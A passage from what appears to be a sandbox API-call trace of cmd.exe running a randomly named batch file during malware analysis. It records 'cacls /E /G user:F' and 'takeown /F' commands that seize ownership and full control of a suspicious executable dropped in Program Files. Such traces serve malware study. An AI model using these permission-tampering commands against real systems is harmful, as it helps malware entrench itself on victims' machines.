dwFlags=0x0, lpSize=0x19eadc | out: lpAttributeList=0x19eaf8, lpSize=0x19eadc) returned 1 [0280.903] UpdateProcThreadAttribute (in: lpAttributeList=0x19eaf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x19eae4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19eaf8, lpPreviousValue=0x0) returned 1 [0280.903] GetStartupInfoW (in: lpStartupInfo=0x19eb30 | out: lpStartupInfo=0x19eb30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0280.904] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0280.904] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0280.906] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x19ea80*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19eacc | out: lpCommandLine="cacls \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0x19eacc*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xfc4, dwThreadId=0xfb4)) returned 1 [0280.913] CloseHandle (hObject=0xb0) returned 1 [0280.913] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0280.913] GetEnvironmentStringsW () returned 0x519df0* [0280.914] FreeEnvironmentStringsA (penv="=") returned 1 [0280.914] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0285.272] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x19ea64 | out: lpExitCode=0x19ea64*=0x0) returned 1 [0285.272] CloseHandle (hObject=0xb8) returned 1 [0285.272] _vsnwprintf (in: _Buffer=0x19eb4c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19ea6c | out: _Buffer="00000000") returned 8 [0285.272] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0285.272] GetEnvironmentStringsW () returned 0x51e300* [0285.272] FreeEnvironmentStringsA (penv="=") returned 1 [0285.272] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0285.272] GetEnvironmentStringsW () returned 0x51e300* [0285.272] FreeEnvironmentStringsA (penv="=") returned 1 [0285.272] DeleteProcThreadAttributeList (in: lpAttributeList=0x19eaf8 | out: lpAttributeList=0x19eaf8) [0285.272] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.272] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0285.358] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.358] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0285.359] _get_osfhandle (_FileHandle=0) returned 0x38 [0285.359] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0285.359] SetConsoleInputExeNameW () returned 0x1 [0285.359] GetConsoleOutputCP () returned 0x1b5 [0285.359] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0285.359] SetThreadUILanguage (LangId=0x0) returned 0x409 [0285.359] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f28c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0285.359] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0285.360] _get_osfhandle (_FileHandle=3) returned 0xb8 [0285.360] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0285.360] _get_osfhandle (_FileHandle=3) returned 0xb8 [0285.360] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0285.360] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x19f25c*=0xc2, lpOverlapped=0x0) returned 1 [0285.360] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0285.360] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0285.360] _get_osfhandle (_FileHandle=3) returned 0xb8 [0285.360] GetFileType (hFile=0xb8) returned 0x1 [0285.360] _get_osfhandle (_FileHandle=3) returned 0xb8 [0285.360] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0285.360] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0285.360] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0285.361] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0285.361] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0285.361] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0285.361] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0285.361] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0285.362] _tell (_FileHandle=3) returned 47 [0285.362] _close (_FileHandle=3) returned 0 [0285.362] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f020 | out: _Buffer="\r\n") returned 2 [0285.362] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.362] GetFileType (hFile=0x3c) returned 0x2 [0285.362] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.362] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19eff8 | out: lpMode=0x19eff8) returned 1 [0285.362] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.362] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f010, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f010*=0x2) returned 1 [0285.362] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0285.362] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0285.362] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19f01c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0285.362] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x19f01c | out: _Buffer=">") returned 1 [0285.362] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.362] GetFileType (hFile=0x3c) returned 0x2 [0285.362] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.362] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19effc | out: lpMode=0x19effc) returned 1 [0285.363] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.363] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x19f014, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x19f014*=0x1e) returned 1 [0285.363] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.363] GetFileType (hFile=0x3c) returned 0x2 [0285.363] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.363] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f29c | out: lpMode=0x19f29c) returned 1 [0285.363] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.363] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x517850*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x19f2b4, lpReserved=0x0 | out: lpBuffer=0x517850*, lpNumberOfCharsWritten=0x19f2b4*=0x7) returned 1 [0285.363] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x19f2bc | out: _Buffer=" /F \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\" ") returned 60 [0285.363] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.363] GetFileType (hFile=0x3c) returned 0x2 [0285.363] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.363] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f294 | out: lpMode=0x19f294) returned 1 [0285.364] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.364] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0x19f2ac, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2ac*=0x3c) returned 1 [0285.364] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f2d0 | out: _Buffer="\r\n") returned 2 [0285.364] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.364] GetFileType (hFile=0x3c) returned 0x2 [0285.364] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.364] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f2a8 | out: lpMode=0x19f2a8) returned 1 [0285.364] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.364] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2c0*=0x2) returned 1 [0285.364] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0285.364] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0285.364] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0285.365] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0285.365] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0285.365] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0285.365] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0285.365] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0285.365] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0285.365] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0285.365] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0285.365] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0285.365] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0285.365] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0285.365] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0285.365] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0285.365] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0285.365] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0285.365] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0285.365] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0285.365] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0285.365] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0285.365] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0285.365] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0285.365] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0285.365] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0285.365] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0285.365] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0285.365] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0285.365] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0285.365] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0285.365] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0285.365] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0285.365] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0285.365] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0285.365] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0285.365] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0285.365] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0285.365] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0285.365] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0285.365] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0285.365] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0285.365] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0285.365] SetErrorMode (uMode=0x0) returned 0x0 [0285.365] SetErrorMode (uMode=0x1) returned 0x0 [0285.365] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51f8e8, lpFilePart=0x19f06c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x19f06c*="Desktop") returned 0x1d [0285.365] SetErrorMode (uMode=0x0) returned 0x1 [0285.366] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0285.366] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0285.366] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0285.366] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.366] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0xffffffff [0285.366] GetLastError () returned 0x2 [0285.366] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.366] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0xffffffff [0285.366] GetLastError () returned 0x2 [0285.366] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.366] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0x510b68 [0285.366] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0285.367] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0xffffffff [0285.367] GetLastError () returned 0x2 [0285.367] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0x510b68 [0285.367] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0285.367] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0285.367] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0285.367] GetConsoleTitleW (in: lpConsoleTitle=0x19ee40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0285.367] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0285.367] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0285.367] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0285.367] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0285.367] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0285.367] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0285.367] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0285.367] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0285.367] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0285.367] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0285.367] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0285.367] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0285.367] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0285.367] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0285.367] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0285.367] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0285.367] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0285.367] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0285.367] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0285.367] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0285.367] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0285.368] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0285.368] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0285.368] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0285.368] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0285.368] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0285.368] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0285.368] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0285.368] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0285.368] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0285.368] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0285.368] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0285.368] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0285.368] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0285.368] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0285.368] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0285.368] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0285.368] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0285.368] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0285.368] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0285.368] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0285.368] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0285.368] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0285.368] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0285.368] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0285.368] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0285.368] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0285.368] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0285.368] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0285.368] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0285.368] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0285.368] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0285.368] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0285.368] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0285.368] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0285.368] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0285.368] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0285.368] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0285.368] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0285.368] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0285.368] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0285.368] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0285.368] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0285.368] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0285.368] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0285.368] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0285.368] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0285.368] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0285.368] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0285.368] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0285.368] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0285.368] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0285.369] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0285.369] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0285.369] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0285.369] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0285.369] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0285.369] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0285.369] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0285.369] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0285.369] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0285.369] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0285.369] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0285.369] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0285.369] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0285.369] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0285.369] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0285.369] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0285.369] SetErrorMode (uMode=0x0) returned 0x0 [0285.369] SetErrorMode (uMode=0x1) returned 0x0 [0285.369] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51cd48, lpFilePart=0x19e94c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x19e94c*="Desktop") returned 0x1d [0285.369] SetErrorMode (uMode=0x0) returned 0x1 [0285.369] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0285.369] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0285.369] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0285.369] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.369] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0xffffffff [0285.370] GetLastError () returned 0x2 [0285.370] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.370] FindFirstFileExW (in: 